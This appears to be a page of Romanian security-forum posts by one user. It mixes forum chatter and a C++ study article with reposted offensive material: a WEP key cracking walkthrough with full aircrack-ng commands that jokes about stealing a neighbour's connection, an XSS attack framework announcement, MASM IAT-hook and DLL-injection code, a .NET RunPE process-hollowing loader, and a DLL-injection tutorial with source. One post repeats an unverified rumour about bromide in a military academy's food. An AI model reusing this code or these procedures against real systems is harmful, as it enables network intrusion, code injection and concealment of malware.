Nytro

Foarte interesant. Ai numai posturi interesante. Ban.

A fost un experiment. Am anuntat de "x" ori. Si nu eu am dat Add la cele 1000 de persoane din lista, doar la cateva. Si tot nu inteleg de unde tot primeam add-uri legate de Metin. Si exista optiunea "Ignore".

La Academia Tehnica Militara nu e tocmai "frumos"... Din mai multe motive: - nu ai foarte multa libertate: nu prea poti lipsi de la cursuri, se verifica camerele uneori, nu ai voie sa iesi de capul tau, sa vii mai tarziu de 23:00 parca, trebuie sa iesi cu invoire, o gramada de chestii - trebuie sa stii si o sa fii forjat cu o gramada de matematica si fizica. Daca vrei sa mergi acolo pentru informatica, nu e alegerea potrivita - da, o sa iesi cu salariu, venit stabil, dar trebuie sa semnezi contract pe 10 ani, si nu poti sa iti dai demisia, cred ca te pun sa platesti daune - la fel cu facultatea, daca vrei sa o abandonezi, trebuie sa platesti cat ai stat - va pun brom in mancare/bautura, in ceai am inteles ca sa nu vi se mai scoale. Sa nu mai aveti asa chef de sex - dimineata trezirea, dati ture pe acolo si tot felul de alte prostii, pe langa datul cu matura prin curte - trebuie sa purtati uniformele alea urate, vara muriti de cald, iarna degerati - salariile nu sunt foarte mari, sfatul meu e sa dai la STS, probele fizice sunt date la misto dar cele scrise sunt mai grele, la MApN am inteles ca nu sunt salarii foarte mari Sunt multe motive pentru care iti recomand sa nu te duci acolo, dar e alegerea ta. Eu iti spun parerea mea si ce am vorbit cu persoane de acolo, cunosc mai multe.

Mie imi place, bravo A, eu nu sunt foarte pretentios la partea de grafica.

Oare ne lasa si pe noi sa il folosim sa crack-uim md5-uri?

XSSF - Cross-Site Scripting Framework v.2.0 Released Friday, June 24, 2011 The Cross-Site Scripting Framework (XSSF) is a security tool designed to turn the XSS vulnerability exploitation task into a much easier work. The XSSF project aims to demonstrate the real dangers of XSS vulnerabilities, vulgarizing their exploitation. This project is created solely for education, penetration testing and lawful research purposes. XSSF allows creating a communication channel with the targeted browser (from a XSS vulnerability) in order to perform further attacks. Users are free to select existing modules (a module = an attack) in order to target specific browsers. XSSF provides a powerfull documented API, which facilitates development of modules and attacks. In addition, its integration into the Metasploit Framework allows users to launch MSF browser based exploit easilly from an XSS vulnerability. Download: https://code.google.com/p/xssf/downloads/list Video demo: http://www.youtube.com/user/X0x1RG9f Sursa: Security-Shell: XSSF - Cross-Site Scripting Framework v.2.0 Released

Poza e facuta la Nicolae Balcescu - Lahovari. Da, e cu mine, o aveam de mult la avatar.

Ca sa inteleaga toata lumea... NU folosesc eu acest ID, poveste lunga. Daca il aveti in lista aflatii IP, trimiteti un fisier si verificati cu netstat sau cu Wireshark incotro se duc datele, nu cred ca trec prin serverele Yahoo. Trimiteti o poza ceva. Sau cel mai bine dati ignore. Desi pe mine ma amuza mass-urile lui. Nu stiu cine e, dar incearca sa va dea stealere. Daca nu aveti ce face, luati fisierele de la el, dar NU LE EXECUTATI, si trimiteti-mi PM cu un link catre ele.

A mea e simpla, dar nu cred ca o ghiciti...

http://www.meh.ro/wp-content/uploads/2011/06/meh.ro7678.jpg

Am vazut ca unele avatare sunt mai mari, cred ca se poate ceva. Vedeti YDK. Dar nu am timp momentan.

[C++] Notiuni de limbaj E un articol scris de mine inainte de examenul de POO (Programare Orientata pe Obiecte) - C++. M-am gandit ca poate ajuta cat de cat colegii mei. - Introducere - Mediu de lucru - Exerci?iul 0: caractere speciale - Exerci?iul 1: const - Exemplul 2: Constructori: - Exerci?iul 3: Func?ii virtuale Acopera notiuni de POO. E scris pentru a exemplifica probleme care pot sa apara in programe C++ si care pot fi de la usor la foarte greu de identificat. Insa este doar o mica colectie, cu explicatiile de riguare. Probleme pot fi multe si foarte variate, si am acoperit foarte putin. PS: Necesita cunostinte de POO: sa stii ce e ala constructor, constructor de copiere, derivare, cateva notiuni cel putin elementare. "Citat": S? lu?m acum un exemplu mai interesant. Lu?m clasele Test ?i Test2, care e derivat? din Test, ambele cu parametru int implicit 0. ?i cre?m un obiect x ?i înc? unul y = x. #include <iostream> using namespace std; class Test { int x; public: Test(int i = 0) : x(i) { cout << "Test: " << i << "\n" ; } ~Test() { cout << "~Test: " << x << "\n" ; } }; class Test2: public Test { int y; public: Test2(int i = 0) : y(i) { cout << "Test2: " << i << "\n" ; } ~Test2() { cout << "~Test2: " << y << "\n" ; } }; int main() { Test2 x(3), y = x; return 0; } În ce ordine se vor apela constructorii? E simplu: Test: 0 - Pentru x, mai întâi se apeleaz? constructorul clasei de baz? cu valoarea implicit? Test2: 3 - Apoi constructorul s?u, Test2, cu valoarea 3 ~Test2: 3 - Destructor y ~Test: 0 - Destructorul clasei de baz? ~Test2: 3 - Destructor x ~Test: 0 - Destructorul clasei de baz? Ce se întâmpl? apoi? E simplu: pentru y nu se apeleaz? constructorul normal, ci se apeleaz? constructorul de copiere, care nu este definit de noi. Deci se creaz? y, un al doilea obiect, de aceea vedem c? se apeleaz? de dou? ori seria ~Test2/~Test. Îns? lucrurile devin mai interesante dac? definim un constructor de copiere pentru Test2. S? îl definim ?i s? increment?m cu 1 valoarea lui y (din Test2) pentru a face diferen?a între obiectele x ?i y. Test2(Test2 &ob) { cout << "Copiere Test2\n" ; y = ob.y + 1; } La rulare, se va afi?a: Test: 0 - Pentru x - baza Test2: 3 - Pentru x – constructorul din derivat? Test: 0 - Interesant. Acum, înaintea constructorului de copiere care se apeleaz? la crearea lui y, se apeleaz? constructorul din clasa de baz? pentru y. Motivul e simplu: se creaz? un nou obiect Test2 ?i asta presupune apelul constructorului clasei de baz?, clasa Test. În primul caz, în care nu aveam un constructor de copiere, x-ul se copia bit cu bit in y ?i nu se mai apela niciun constructor al clasei de baz?. A?adar, aten?ie la astfel de lucruri m?runte Copiere Test2 - Se apeleaz? ?i constructorul de copiere ~Test2: 4 - Destructorul lui y mai întâi, destructorii se apeleaz? în ordine invers? ~Test: 0 - Destructorul din baz? al lui y ~Test2: 3 - Destructorul lui x ~Test: 0 - Destructorul din baz? al lui x Download: http://www.speedyshare.com/files/29050808/C_notiuni_de_limbaj.pdf http://www.mediafire.com/?sn66k96645034tj http://www.megaupload.com/?d=RZ13C013 RTTI - Runtime Type Identification/Information: E o facilitate a limbajului care permite identificarea tipului variabilelor la executie. Pentru inceput e necesar un header: #include <typeinfo> Utilitatea lui e urmatoarea: poti identifica tipul unei variabile, de obicei pointer, la executie, si poti preveni anumite erori. Sa zicem ca avem o clasa A, o clasa B care o mosteneste pe A, si o clasa C care o mosteneste pe A. Folosind un pointer la A vom putea indica catre un obiect de tipul A, B sau C, si e posibil sa nu stim sigur catre ce tip de obiect indica pointerul. A *p; Putem avea: p = new A; // Clasic p = new B; // B fiind derivata din A p = new C; // Putem crea p-ul in functie de niste date introduse de la tastatura de exemplu, deci nu putem stii catre ce tip indica, aici ne ajuta RTTI-ul. Pentru a obtine tipul unei variabile, apelam functia "typeid()". Functia NU returneaza un sir de caractere care reprezinta numele tipului variabilelei, ci returneaza un obiect de tipul "type_info". Aceasta este de fapt o clasa cu cateva metode. Deci functia va returna un obiect care are metodele: - name() - Cea mai importanta metoda, returneaza un sir de caractere care reprezinta numele tipului variabilei (pointer, obiect, int... ) ca parametru. De exemplu, typeid(x).name va fi "i" in cazul in care x e un int, va fi "l" pentru cazul in care e un long si asa mai departe. Insa utilitatea apare la pointeri cand lucram cu clase derivate. Sa luam urmatoarele clase: class C1 { public: C1() { cout << "C1\n"; } }; class C2: public C1 { public: C2() { cout << "C2\n"; } }; Apoi vrem sa cream un pointer si sa vedem tipul sau: int main() { C1 *x = new C1; cout << typeid(x).name(); return 0; } E cazul clasic, se va afisa "P2C1". "P" = pointer, "2"-ul reprezinta numarul de caractere al numelui clasei. Clasa "C1" are 2 caractere, daca aveam clasa "Test" aveam 4 caractere. Iar "C1" reprezinta desigur tipul pointerului. De asemenea: C1 *x = new C2; cout << typeid(x).name(); Va afisa TOT "P2C1" pentru c x este un pointer la tipul C1, chiar daca indica spre un obiect de tipul C2. De asemenea: C1 *x = new C2; cout << typeid(*x).name(); Va afisa "2C2", deci va afisa ca indica spre un obiect de tipul C2. Despre type_info ar mai fi important ca supraincarca operatorul ==, astfel poti compara typeid(x) == typeid(y). La fel si !=. E scris pe la 23:00 - 24:00 inainte de examen, nu am avut timp sa scriu mai mult. Sper sa va ajute.

Iar incepeti cu topicuri dinastea penibile? Inchis si mutat la gunoi.

Wireless Wep Key Cracking WEP Cracking by %ebx DISCLAIMER: I DO NOT encourage cracking others wireless protection!. This is illegal! The AP I'm cracking belongs to me and I wrote this as a proof of concept. There's a reason they have a key, they don't want you stealing their bandwidth! That beeing said: Why would you want to crack WEP protected wireless networks? 1. Because you don't have a internet connection and that bastard neighbor of yours has the money to get one 2. Your dad pulls your ethernet cable out every night at 10 so you don't stay up all night talking to some bimbo 3. Because you can and you want to! What do you need? 1. A wireless network card(obviouslly) with drivers up and running. Your need your driver to be able to inject packets, otherwise you're gonna spend days gathering enough packets for a successful crack. I had to recompile my kernel module because I use a damn Broadcom card, and injection wouldn't work..not sure why. 2. Linux (Ubuntu Gutsy in this case), though you can do this from Windows and MacOS too, with the appropriate software. 3. The aircrack-ng suite $sudo apt-get install aircrack-ng Ok..off we go [NOTE] I color coded the "sensitive" information: AP MAC address, AP Name, miscelaneous MAC addresses and my MAC address. There's a legend on the bottom with the colours and what they correspond to So..how do we crack WEP? Well basically...whenever a wireless card "talks" to a access point (AP from now on), it sends/receives some interesting info along with the packets, info that can be used to get the actual WEP key(using the aircrack utility). What we need is to gather enough packets so that aircrack can do it's job [NOTE] eth0 is our wireless card for the remaining of this tutorial STEP 1: We must put the wireless card in monitor mode. A wireless card in monitor mode basically allows us to sniff all the wireless traffic around us We do this by issuing the following command: [check screenshot 1] ebx@skynet:-$ sudo airmon-ng start eth0 You should see "monitor mode enabled" in there. That means we're good and can proceed to the next step Step 2: In this step we need to get the MAC address of the AP we're after, the AP name and the channel it's on. To do this we first sniff all the traffic so we can see what AP we're gonna focus on(the one with more beacons/data usually, if we want a random crack, or a specific one if you're set on someone "special") We do this by running: [check screenshot 1] ebx@skynet:-$ sudo airodump-ng eth0 You should get a screen similar to the one in screenshot 2 I grayed out everything I don't need. The important part is the line with the AP I got my eyes on, the one with red. We just make a note of the MAC address, the AP name and the channel the AP is on. Step 3: This is the step where we actually start capturing packets for use in the cracking We do this by running: [check screenshot 3] ebx@skynet:-$ sudo airodump-ng -c 1 --bssid [THE AP MAC ADDRESS] -w capture eth0 This starts the actual capture of packets. It captures all traffic on channel 1 (the channel the AP was on), but only the traffic going to our AP, and saves the packets in a file called capture-01.cap (airodump-ng adds the -01.cap) You should get something similar to screenshot 4. The "#Data" field is what were's interested in getting high enough. We need thousands of packets to have a successful crack. This is all fine and dandy, and we could just leave this for...hmmm...days 'till it gathers enough packets...Or we could speed the process QUITE A LOT! by using aireplay-ng Step 4: In this step we speed things up by sending a lot of packets to the AP, so we get responses from it (responses that contain that interesting data we're after This is done in 2 steps I'm not going to explain the options I use, just trust me . Or run aireplay-ng with no options so you can see the available options A. First we need to associate out wireless card with the AP so it accepts packets from us [check screenshot 5] ebx@skynet:-$ sudo aireplay-ng -1 0 -e [AP NAME] -a [AP MAC ADDRESS] -h [MY MAC ADDRESS] eth0 If we get "Association successful :-)" then we can proceed to the next step of the packet sending speed up, otherwise something is wrong, eiter you're to far away from the AP, or it has MAC filtering enabled. If we have a successful association, then we can see our MAC address appears as associated to the AP (check screenshot 5 - the left terminal) B. Now we need to start sending packets. Again I'm not going to explain the options used, just RTFM! [check screenshot 6] ebx@skynet:-$ sudo aireplay-ng -3 -b [AP MAC ADDRESS] -h [MY MAC ADDRESS] -x 100 eth0 After a bit of packet reading you should see the sent packets run like crazy, wich also makes our "#Data" field go up like there's no tomorrow!. This is good news. If this step fails, your card/driver probably doesn't have injection capabilities..wich is bad news. But not entirely, just means that you're gonna spend a whole lot more time in cracking because packets come in A LOT slower! This is it...now we just need to sit and wait for enough packets so we can begin our crack. You can just wait and try running the next step from time to time, or do it like I do, run the next step now as it updates the reading realtime. Step 5: In this step we start cracking the WEP using aircrack-ng [check screenshot 7] ebx@skynet:-$ sudo aircrack-ng -n 64 -f 4 capture-01.cap "-n 64" tells aircrack-ng to crack a 64 bit WEP (I already know the key is 64 bit as I have cracked it before ). If not sure test with "-n 64" of with no "-n" at all if that fails. "-f" is the fudge factor. If cracking doesn't work, try raising this to some other value(below 32) If enough packets were gathered, you WILL have a successfull crack. With 250.000 packets I (well aircrack-ng) cracked the key in 3 seconds! [check screenshot 8] We get the key in HEX and ASCII. We will be using the ASCII one. This is it. We have the key, now all there's left is to use it! Now we can just stop capturing (CTRL+C in the other 2 terminals, then close them). After packet capturing is over, we need to take our card OUT of monitor mode ebx@skynet:-$ sudo airmon-ng stop eth0 Step 6: This is optional. You could use any GUI manager to set things up, but I prefer doing it manually ebx@skynet:-$ sudo iwconfig eth0 essid [AP NAME] ebx@skynet:-$ sudo iwconfig eth0 ap [AP MAC ADDRESS] ebx@skynet:-$ sudo iwconfig eth0 key on ebx@skynet:-$ sudo iwconfig eth0 key s:[THE ASCII KEY] ebx@skynet:-$ sudo dhclient eth0 Sursa (si screenshots): Wireless Wep Key Cracking - rohitab.com - Forums

[MASM] IAT Hook Author: steve10120 ; steve10120@ic0de.org ; ######################################################################### .586 .model flat, stdcall option casemap :none ; case sensitive ; ######################################################################### include \masm32\include\windows.inc include \masm32\include\user32.inc include \masm32\include\kernel32.inc include \masm32\include\comdlg32.inc includelib \masm32\lib\user32.lib includelib \masm32\lib\kernel32.lib includelib \masm32\lib\comdlg32.lib ; ######################################################################### .data szDLL db "user32.dll",0 szAPI db "MessageBoxA",0 szHooked db "API Hooked",0 szText db "Hello World!",0 szCaption db "http://ic0de.org",0 .data? dwOldProtect dd ? pMessageBoxA dd ? .code HookIAT proc inModule:DWORD, inHookProc:DWORD, inOriginalFunction:DWORD PUSH ESI PUSH EDI MOV EDI, inModule ASSUME EDI:PTR IMAGE_DOS_HEADER CMP [EDI].e_magic, IMAGE_DOS_SIGNATURE JNE CodeFail ADD EDI, DWORD PTR[EDI+03Ch] ASSUME EDI:PTR IMAGE_NT_HEADERS CMP [EDI].Signature, IMAGE_NT_SIGNATURE JNE CodeFail MOV EDI, [EDI].OptionalHeader.DataDirectory[8].VirtualAddress ADD EDI, inModule ASSUME EDI:PTR IMAGE_IMPORT_DESCRIPTOR ImportLoop: CMP [EDI].FirstThunk, 0 Je OriginalThunk MOV ESI, [EDI].FirstThunk JMP ContinueMain OriginalThunk: MOV ESI, [EDI].OriginalFirstThunk ContinueMain: ADD ESI, inModule ThunkLoop: MOV EAX, [inOriginalFunction] MOV [pMessageBoxA], EAX CMP DWORD PTR[ESI], EAX JNE ContinueThunks MOV EBX, [inHookProc] invoke VirtualProtect, ESI, 4, PAGE_EXECUTE_READWRITE, OFFSET dwOldProtect MOV DWORD PTR[ESI], EBX XOR EAX, EAX INC EAX ContinueThunks: ADD ESI, 4 CMP DWORD PTR[ESI], 0 JNE ThunkLoop ADD EDI, sizeof(IMAGE_IMPORT_DESCRIPTOR) CMP [EDI].Name1, 0 JNE ImportLoop CodeFail: XOR EAX, EAX HookEnd: POP EDI POP ESI MOV ESP, EBP POP EBP RETN 0Ch HookIAT endp MessageBoxAHookProc proc hWindow:DWORD, lpszText:DWORD, lpszCaption:DWORD, uStyle:DWORD PUSH 0 PUSH OFFSET szCaption PUSH OFFSET szHooked PUSH 0 CALL [pMessageBoxA] MOV ESP, EBP POP EBP RETN 010h MessageBoxAHookProc endp start: invoke LoadLibraryA, OFFSET szDLL TEST EAX, EAX JE EndMain invoke GetProcAddress, EAX, OFFSET szAPI TEST EAX, EAX JE EndMain MOV EBX, EAX invoke GetModuleHandleA, NULL TEST EAX, EAX JE EndMain invoke HookIAT, EAX, OFFSET MessageBoxAHookProc, EBX invoke MessageBoxA, 0, OFFSET szText, OFFSET szAPI, 0 EndMain: RETN end start Sursa: ic0de.org

[MASM] DLL Injection Author: steve10120 ; steve10120@ic0de.org ; ######################################################################### .586 .model flat, stdcall option casemap :none ; case sensitive ; ######################################################################### include \masm32\include\windows.inc include \masm32\include\user32.inc include \masm32\include\kernel32.inc include \masm32\include\comdlg32.inc includelib \masm32\lib\user32.lib includelib \masm32\lib\kernel32.lib includelib \masm32\lib\comdlg32.lib ; ######################################################################### .data szDLL db "C:\masm32\projects\dll_injection\TestDll.dll",0 szKernel32 db "kernel32.dll",0 szLoadLibA db "LoadLibraryA",0 .code InjectDLL proc inProcess:DWORD, inDLLPath:DWORD LOCAL hProcess:DWORD LOCAL pDLL:DWORD LOCAL dwDLLSize:DWORD LOCAL dwWritten:DWORD LOCAL dwThreadID:DWORD invoke OpenProcess, PROCESS_ALL_ACCESS, FALSE, inProcess TEST EAX, EAX JE CodeFail MOV hProcess, EAX invoke lstrlenA, inDLLPath TEST EAX, EAX JE CodeFail INC EAX MOV dwDLLSize, EAX invoke VirtualAllocEx, hProcess, NULL, dwDLLSize, MEM_COMMIT, PAGE_READWRITE TEST EAX, EAX JE CodeFail MOV pDLL, EAX invoke WriteProcessMemory, hProcess, pDLL, inDLLPath, dwDLLSize, ADDR dwWritten TEST EAX, EAX JE CodeFail invoke LoadLibraryA, OFFSET szKernel32 invoke GetProcAddress, EAX, OFFSET szLoadLibA TEST EAX, EAX JE CodeFail MOV EBX, EAX ; got a compiler error if I just left EAX, so yeah.. invoke CreateRemoteThread, hProcess, NULL, 0, EBX, pDLL, 0, ADDR dwThreadID TEST EAX, EAX JE CodeFail invoke CloseHandle, hProcess XOR EAX, EAX INC EAX JMP EndInject CodeFail: XOR EAX, EAX EndInject: MOV ESP, EBP ; yeah, still don't know why MASM creates a stack frame but doesn't restore it. Any ideas? POP EBP RETN 8 InjectDLL endp start: invoke InjectDLL, 2420, OFFSET szDLL EndMain: RETN end start Sursa: ic0de.org

[MASM] Native Enum Processes Author: steve10120 ; steve10120@ic0de.org ; ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ include \masm32\include\masm32rt.inc include \masm32\include\ntdll.inc includelib \masm32\lib\user32.lib includelib \masm32\lib\kernel32.lib includelib \masm32\lib\ntdll.lib ; ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ CLIENT_ID STRUCT UniqueProcess dd ? UniqueThread dd ? CLIENT_ID ENDS SYSTEM_THREADS struct KernelTime LARGE_INTEGER <> UserTime LARGE_INTEGER <> CreateTime LARGE_INTEGER <> WaitTime dd ? StartAddress dd ? ClientId CLIENT_ID <> Priority SDWORD ? BasePriority SDWORD ? ContextSwitchCount dd ? State dd ? WaitReason dd ? SYSTEM_THREADS ends UNICODE_STRING STRUCT Len WORD ? MaximumLength WORD ? Buffer PWSTR ? UNICODE_STRING ends VM_COUNTERS STRUCT PeakVirtualSize DWORD ? ; SIZE_T VirtualSize DWORD ? ; SIZE_T PageFaultCount DWORD ? PeakWorkingSetSize DWORD ? ; SIZE_T WorkingSetSize DWORD ? ; SIZE_T QuotaPeakPagedPoolUsage DWORD ? ; SIZE_T QuotaPagedPoolUsage DWORD ? ; SIZE_T QuotaPeakNonPagedPoolUsage DWORD ? ; SIZE_T QuotaNonPagedPoolUsage DWORD ? ; SIZE_T PagefileUsage DWORD ? ; SIZE_T PeakPagefileUsage DWORD ? ; SIZE_T VM_COUNTERS ENDS SYSTEM_PROCESS_INFORMATION struct NextEntryDelta dd ? ThreadCount dd ? Reserved1 dd 6 dup (?) CreateTime LARGE_INTEGER <> UserTime LARGE_INTEGER <> KernelTime LARGE_INTEGER <> ProcessName UNICODE_STRING <> BasePriority SDWORD ? ProcessId dd ? InheritedFromProcessId dd ? HandleCount dd ? Reserved2 dd 2 dup (?) VmCounters VM_COUNTERS <> ;IO_COUNTERS IoCounters; // Windows 2000 only Threads SYSTEM_THREADS <> SYSTEM_PROCESS_INFORMATION ends .data szBuffer db 256 dup(0) .data? dwReturnLength dd ? .code WideToAnsi proc szData:DWORD invoke WideCharToMultiByte, CP_ACP, WC_COMPOSITECHECK, szData, INVALID_HANDLE_VALUE, ADDR szBuffer, 256, NULL, NULL LEAVE RETN 4 WideToAnsi endp start: invoke NtQuerySystemInformation, 5, NULL, 0, ADDR dwReturnLength invoke VirtualAlloc, NULL, dwReturnLength, MEM_COMMIT, PAGE_READWRITE TEST EAX, EAX JE EndMain MOV EDI, EAX invoke NtQuerySystemInformation, 5, EDI, dwReturnLength, ADDR dwReturnLength TEST EAX, EAX JNE FreeMem ASSUME EDI:PTR SYSTEM_PROCESS_INFORMATION ProcessLoop: MOV EAX, [EDI].ProcessName.Buffer TEST EAX, EAX JE NextItem invoke WideToAnsi, EAX print OFFSET szBuffer, 13, 10 NextItem: CMP [EDI].NextEntryDelta, 0 JE FreeMem ADD EDI, [EDI].NextEntryDelta JMP ProcessLoop FreeMem: invoke VirtualFree, EDI, 0, MEM_RELEASE EndMain: inkey RETN end start Sursa: ic0de.org

[.NET] 64-Bit working RunPE Imports System.Runtime.InteropServices Imports System.Text Public Class RunPE <DllImport("kernel32")> _ Private Shared Function CreateProcess(ByVal appName As String, ByVal commandLine As StringBuilder, ByVal procAttr As IntPtr, ByVal thrAttr As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal inherit As Boolean, ByVal creation As Integer, _ ByVal env As IntPtr, ByVal curDir As String, ByVal sInfo As Byte(), ByVal pInfo As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean End Function <DllImport("kernel32")> _ Private Shared Function GetThreadContext(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean End Function <DllImport("ntdll")> _ Private Shared Function NtUnmapViewOfSection(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr) As UInteger End Function <DllImport("kernel32")> _ Private Shared Function ReadProcessMemory(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr, ByRef bufr As IntPtr, ByVal bufrSize As Integer, ByRef numRead As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean End Function <DllImport("kernel32.dll")> _ Private Shared Function ResumeThread(ByVal hThread As IntPtr) As UInteger End Function <DllImport("kernel32")> _ Private Shared Function SetThreadContext(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean End Function <DllImport("kernel32")> _ Private Shared Function VirtualAllocEx(ByVal hProc As IntPtr, ByVal addr As IntPtr, ByVal size As IntPtr, ByVal allocType As Integer, ByVal prot As Integer) As IntPtr End Function <DllImport("kernel32", CharSet:=CharSet.Auto, SetLastError:=True)> _ Private Shared Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As IntPtr, ByVal flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean End Function <DllImport("kernel32.dll", SetLastError:=True)> _ Private Shared Function WriteProcessMemory(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByVal lpNumberOfBytesWritten As Integer) As Boolean End Function Public Shared Function InjectPE(ByVal bytes As Byte(), ByVal surrogateProcess As String) As Boolean Try Dim procAttr As IntPtr = IntPtr.Zero Dim processInfo As IntPtr() = New IntPtr(3) {} Dim startupInfo As Byte() = New Byte(67) {} Dim num2 As Integer = BitConverter.ToInt32(bytes, 60) Dim num As Integer = BitConverter.ToInt16(bytes, num2 + 6) Dim ptr4 As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H54)) If CreateProcess(Nothing, New StringBuilder(surrogateProcess), procAttr, procAttr, False, 4, _ procAttr, Nothing, startupInfo, processInfo) Then Dim ctxt As UInteger() = New UInteger(178) {} ctxt(0) = &H10002 If GetThreadContext(processInfo(1), ctxt) Then Dim baseAddr As New IntPtr(ctxt(&H29) + 8L) Dim buffer__1 As IntPtr = IntPtr.Zero Dim bufferSize As New IntPtr(4) Dim numRead As IntPtr = IntPtr.Zero If ReadProcessMemory(processInfo(0), baseAddr, buffer__1, CInt(bufferSize), numRead) AndAlso (NtUnmapViewOfSection(processInfo(0), buffer__1) = 0) Then Dim addr As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H34)) Dim size As New IntPtr(BitConverter.ToInt32(bytes, num2 + 80)) Dim lpBaseAddress As IntPtr = VirtualAllocEx(processInfo(0), addr, size, &H3000, &H40) Dim lpNumberOfBytesWritten As Integer WriteProcessMemory(processInfo(0), lpBaseAddress, bytes, CUInt(CInt(ptr4)), lpNumberOfBytesWritten) Dim num5 As Integer = num - 1 For i As Integer = 0 To num5 Dim dst As Integer() = New Integer(9) {} Buffer.BlockCopy(bytes, (num2 + &HF8) + (i * 40), dst, 0, 40) Dim buffer2 As Byte() = New Byte((dst(4) - 1)) {} Buffer.BlockCopy(bytes, dst(5), buffer2, 0, buffer2.Length) size = New IntPtr(lpBaseAddress.ToInt32() + dst(3)) addr = New IntPtr(buffer2.Length) WriteProcessMemory(processInfo(0), size, buffer2, CUInt(addr), lpNumberOfBytesWritten) Next size = New IntPtr(ctxt(&H29) + 8L) addr = New IntPtr(4) WriteProcessMemory(processInfo(0), size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), CUInt(addr), lpNumberOfBytesWritten) ctxt(&H2C) = CUInt(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40)) SetThreadContext(processInfo(1), ctxt) End If End If ResumeThread(processInfo(1)) End If Catch Return False End Try Return True End Function End Class Sursa: ic0de.org

[TUT] Different methods of DLL Injection Dll Injection Tutorial by Darawk Source ://www.blizzhackers.cc/viewtopic.php?p=2483118# Introduction The CreateRemoteThread method The SetWindowsHookEx method The code cave method Appendix A - Methods of obtaining a process ID Appendix B - Methods of obtaining a thread ID Appendix C - Complete CreateRemoteThread example source code Appendix D - Complete SetWindowsHookEx example source code Appendix E - Complete code cave example source code Introduction In this tutorial i'll try to cover all of the known methods(or at least, those that I know =p) of injecting dll's into a process. Dll injection is incredibly useful for TONS of stuff(game hacking, function hooking, code patching, keygenning, unpacking, etc..). Though there are scattered tutorials on these techniques available throughout the web, I have yet to see any complete tutorials detailing all of them(there may even be more out there than I have here, of course), and comparing their respective strength's and weakness's. This is precisely what i'll attempt to do for you in this paper. You are free to reproduce or copy this paper, so long as proper credit is given and you don't modify it without speaking to me first. The CreateRemoteThread method I've used this in tons of stuff, and I only recently realized that a lot of people have never seen it, or know how to do it. I can't take credit for thinking it up...I got it from an article on codeproject, but it's a neat trick that I think more people should know how to use. The trick is simple, and elegant. The windows API provides us with a function called CreateRemoteThread(). This allows you to start a thread in another process. For our purposes, i'll assume you know how threading works, and how to use functions like CreateThread(if not, you can go here ). The main disadvantage of this method is that it will work only on windows NT and above. To prevent it from crashing, you should use this function to check to make sure you're on an NT-based system(thanks to CatID for pointing this out): bool IsWindowsNT() { // check current version of Windows DWORD version = GetVersion(); // parse return DWORD majorVersion = (DWORD)(LOBYTE(LOWORD(version))); DWORD minorVersion = (DWORD)(HIBYTE(LOWORD(version))); return (version < 0x80000000); } The MSDN definition for CreateRemoteThread is as follows: HANDLE CreateRemoteThread( HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId ); So, it's essentially CreateThread, with an hProcess argument, so that we can tell it in which process to create the new thread. Now, normally we would want to start the thread executing on some internal function of the process that we are interacting with. However, to inject a dll, we have to do something a little bit different. BOOL InjectDLL(DWORD ProcessID) { HANDLE Proc; char buf[50]={0}; LPVOID RemoteString, LoadLibAddy; if(!ProcessID) return false; Proc = OpenProcess(CREATE_THREAD_ACCESS, FALSE, ProcessID); if(!Proc) { sprintf(buf, "OpenProcess() failed: %d", GetLastError()); MessageBox(NULL, buf, "Loader", NULL); return false; } LoadLibAddy = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); RemoteString = (LPVOID)VirtualAllocEx(Proc, NULL, strlen(DLL_NAME), MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE); WriteProcessMemory(Proc, (LPVOID)RemoteString, DLL_NAME,strlen(DLL_NAME), NULL); This code, calls CreateRemoteThread() with a lpStartAddress of LoadLibrary(). So, it starts a new thread in the remote process and executes the LoadLibrary() function. Luckily for us, this function takes only one argument, the name of the dll to load. We can pass this in the arg field of CreateRemoteThread(). However, there is a minor dilemma. Since this thread will not be executing in our address space, it won't be able to refer to strings(such as the name of the dll) that are in our address space. So, before calling CreateRemoteThread(), we have to allocate space in the other process, using VirtualAllocEx(), and write our string there. Finally, we pass the pointer to the string inside the remote process in the single arg field of CreateRemoteThread(), and voila...Our dll is now loaded and running smoothly within the remote process. This is the generic loader program I use whenever I need to load a dll. The SetWindowsHookEx method The SetWindowsHookEx method is a little bit more intrusive than the first, and creates more of a commotion in the injected process, which we normally don't want. However, it is a little bit easier to use than the first, and does have it's own advantages (like being able to inject into every process on the system in one shot). The SetWindowsHookEx() function is designed to allow you to "hook" windows messages for a given thread. This requires that you inject a dll into that process's address space, so SetWindowsHookEx() handles all that for us. The dll must have a function for the hook that it created though, otherwise it will crash. HHOOK SetWindowsHookEx( int idHook, HOOKPROC lpfn, HINSTANCE hMod, DWORD dwThreadId ); idHook is just that, the ID of the message that we want to hook. There are many of them(for a complete list, go here 